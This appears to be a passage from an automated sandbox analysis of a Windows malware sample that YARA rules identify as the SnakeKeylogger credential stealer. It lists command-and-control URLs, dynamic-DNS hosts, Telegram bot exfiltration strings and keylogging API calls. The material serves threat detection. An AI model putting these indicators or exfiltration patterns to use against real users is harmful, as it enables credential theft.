                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: ftp.ercolina-usa.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 17 Mar 2025 12:03:49 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: RegSvcs.exe, 00000002.00000002.3423549370.000000000307F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegSvcs.exe, 00000002.00000002.3423549370.000000000308F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ercolina-usa.com
                Source: RegSvcs.exe, 00000002.00000002.3423549370.000000000308F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.ercolina-usa.com
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RegSvcs.exe, 00000002.00000002.3424896751.00000000041AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RegSvcs.exe, 00000002.00000002.3424896751.00000000041AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000003023000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000003014000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000003054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000003023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000003014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en8
                Source: RegSvcs.exe, 00000002.00000002.3423549370.000000000301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBDr
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RegSvcs.exe, 00000002.00000002.3424896751.00000000041AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: RegSvcs.exe, 00000002.00000002.3424896751.00000000041AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
                Source: RegSvcs.exe, 00000002.00000002.3424896751.00000000041AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000003054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000003054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000003045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/8
                Source: RegSvcs.exe, 00000002.00000002.3423549370.000000000304F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBDr
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
                Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49704 version: TLS 1.2
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006C425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_006C425A
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006C4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_006C4458
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006C425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_006C425A
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006B0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_006B0219
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006DCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_006DCDAC

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe PID: 6244, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 2400, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: This is a third-party compiled AutoIt script.0_2_00653B4C
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980133727.0000000000705000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_80642332-5
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980133727.0000000000705000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_04ac06ba-f
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b8ce74a5-7
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0afa3d3b-5
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006B4021: CreateFileW,DeviceIoControl,CloseHandle,0_2_006B4021
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006A8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_006A8858
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006B545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_006B545F
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_0065E8000_2_0065E800
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_0065FE400_2_0065FE40
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_0065E0600_2_0065E060
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006D804A0_2_006D804A
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006641400_2_00664140
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006724050_2_00672405
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006865220_2_00686522
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006D06650_2_006D0665
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_0068267E0_2_0068267E
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006668430_2_00666843
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_0067283A0_2_0067283A
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006889DF0_2_006889DF
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_00668A0E0_2_00668A0E
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006D0AE20_2_006D0AE2
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_00686A940_2_00686A94
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006AEB070_2_006AEB07
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006B8B130_2_006B8B13
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_0067CD610_2_0067CD61
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006870060_2_00687006
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_0066710E0_2_0066710E
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006631900_2_00663190
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006512870_2_00651287
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006733C70_2_006733C7
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_0067F4190_2_0067F419
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006716C40_2_006716C4
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006656800_2_00665680
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006658C00_2_006658C0
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006778D30_2_006778D3
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_0067DBB50_2_0067DBB5
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_00671BB80_2_00671BB8
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_00689D050_2_00689D05
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_0067BFE60_2_0067BFE6
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_00671FD00_2_00671FD0
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_037E35F00_2_037E35F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_012553802_2_01255380
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0125D2A92_2_0125D2A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0125C4702_2_0125C470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0125C7492_2_0125C749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_012569A82_2_012569A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_012529F82_2_012529F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0125E9D02_2_0125E9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0125CA202_2_0125CA20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_01259DE02_2_01259DE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0125CCF82_2_0125CCF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_01256FD02_2_01256FD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0125BFD02_2_0125BFD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0125CFD02_2_0125CFD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0125C1982_2_0125C198
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0125F9B82_2_0125F9B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0125E9C02_2_0125E9C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_01253E112_2_01253E11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A681E82_2_05A681E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6D0182_2_05A6D018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A67B882_2_05A67B88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A68FC82_2_05A68FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A611A02_2_05A611A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6BDA82_2_05A6BDA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6BDB82_2_05A6BDB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A681142_2_05A68114
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A69D812_2_05A69D81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A69D902_2_05A69D90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A611912_2_05A61191
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6DDE02_2_05A6DDE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A615E82_2_05A615E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A615F82_2_05A615F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6DDD02_2_05A6DDD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A681D92_2_05A681D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6B9202_2_05A6B920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A60D382_2_05A60D38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6D9382_2_05A6D938
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6B9112_2_05A6B911
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6F9602_2_05A6F960
